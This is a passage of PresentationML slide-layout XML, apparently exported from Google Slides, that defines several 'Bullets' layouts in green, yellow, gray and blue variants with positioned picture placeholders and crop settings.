          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="581" name="Google Shape;581;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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32. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 582"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p33"/>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85" name="Google Shape;585;p3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86" name="Google Shape;586;p3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87" name="Google Shape;587;p3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88" name="Google Shape;588;p3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89" name="Google Shape;589;p3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0" name="Google Shape;590;p33"/>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1" name="Google Shape;591;p33"/>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33"/>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33"/>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33"/>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5" name="Google Shape;595;p33"/>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6" name="Google Shape;596;p33"/>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7" name="Google Shape;597;p33"/>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33"/>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99" name="Google Shape;599;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="600" name="Google Shape;600;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Google Shape;601;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="602" name="Google Shape;602;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Google Shape;603;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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33. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 604"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p34"/>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3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7" name="Google Shape;607;p3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08" name="Google Shape;608;p3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09" name="Google Shape;609;p3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10" name="Google Shape;610;p3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11" name="Google Shape;611;p3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2" name="Google Shape;612;p34"/>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3" name="Google Shape;613;p34"/>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34"/>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34"/>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34"/>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7" name="Google Shape;617;p34"/>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8" name="Google Shape;618;p34"/>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9" name="Google Shape;619;p34"/>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34"/>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21" name="Google Shape;621;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="622" name="Google Shape;622;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="623" name="Google Shape;623;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="624" name="Google Shape;624;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;625;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>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guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>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34. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 626"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p35"/>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3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9" name="Google Shape;629;p3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30" name="Google Shape;630;p3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31" name="Google Shape;631;p3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32" name="Google Shape;632;p3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33" name="Google Shape;633;p3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34" name="Google Shape;634;p35"/>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35" name="Google Shape;635;p35"/>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35"/>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35"/>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35"/>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39" name="Google Shape;639;p35"/>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0" name="Google Shape;640;p35"/>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1" name="Google Shape;641;p35"/>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5"/>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43" name="Google Shape;643;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="644" name="Google Shape;644;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Google Shape;645;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="646" name="Google Shape;646;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="Google Shape;647;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>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35. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 648"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Google Shape;649;p36"/>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3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1" name="Google Shape;651;p3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52" name="Google Shape;652;p3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53" name="Google Shape;653;p3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54" name="Google Shape;654;p3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55" name="Google Shape;655;p3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6" name="Google Shape;656;p36"/>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7" name="Google Shape;657;p36"/>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36"/>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36"/>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36"/>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36"/>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36"/>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63" name="Google Shape;663;p36"/>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64" name="Google Shape;664;p36"/>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65" name="Google Shape;665;p36"/>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66" name="Google Shape;666;p36"/>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67" name="Google Shape;667;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="668" name="Google Shape;668;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="669" name="Google Shape;669;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="Google Shape;670;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="671" name="Google Shape;671;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="672" name="Google Shape;672;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>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36. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 673"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p37"/>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3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76" name="Google Shape;676;p3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77" name="Google Shape;677;p3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78" name="Google Shape;678;p3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79" name="Google Shape;679;p3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80" name="Google Shape;680;p3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1" name="Google Shape;681;p37"/>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2" name="Google Shape;682;p37"/>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37"/>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37"/>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37"/>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37"/>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37"/>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8" name="Google Shape;688;p37"/>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9" name="Google Shape;689;p37"/>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0" name="Google Shape;690;p37"/>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1" name="Google Shape;691;p37"/>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92" name="Google Shape;692;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="693" name="Google Shape;693;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="694" name="Google Shape;694;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="695" name="Google Shape;695;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="696" name="Google Shape;696;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="697" name="Google Shape;697;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577804"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37. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 698"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Google Shape;699;p38"/>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3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01" name="Google Shape;701;p3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02" name="Google Shape;702;p3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03" name="Google Shape;703;p3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04" name="Google Shape;704;p3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05" name="Google Shape;705;p3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06" name="Google Shape;706;p38"/>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07" name="Google Shape;707;p38"/>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38"/>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38"/>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38"/>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38"/>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38"/>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3" name="Google Shape;713;p38"/>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4" name="Google Shape;714;p38"/>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5" name="Google Shape;715;p38"/>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6" name="Google Shape;716;p38"/>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17" name="Google Shape;717;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="718" name="Google Shape;718;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="719" name="Google Shape;719;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="720" name="Google Shape;720;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="721" name="Google Shape;721;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722" name="Google Shape;722;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>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38. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 723"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="Google Shape;724;p39"/>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3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6" name="Google Shape;726;p3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27" name="Google Shape;727;p3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28" name="Google Shape;728;p3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29" name="Google Shape;729;p3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30" name="Google Shape;730;p3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31" name="Google Shape;731;p39"/>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32" name="Google Shape;732;p39"/>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39"/>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39"/>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39"/>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39"/>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39"/>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38" name="Google Shape;738;p39"/>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39" name="Google Shape;739;p39"/>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0" name="Google Shape;740;p39"/>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1" name="Google Shape;741;p39"/>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42" name="Google Shape;742;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;743;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
